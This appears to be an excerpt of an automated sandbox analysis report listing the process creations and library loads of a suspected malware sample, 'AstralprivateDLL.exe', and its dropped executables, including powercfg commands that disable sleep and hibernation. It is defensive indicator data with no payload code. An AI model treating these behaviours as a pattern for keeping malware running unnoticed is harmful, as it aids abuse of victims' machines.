                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF04D.tmp" "c:\Windows\System32\CSCC4EE3A879404710AD2E4883A563BED.TMP"
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\AstralprivateDLL.exe.bin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\Astral private DLL.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: version.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\containerperf\ServerComponenthostMonitorDll.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
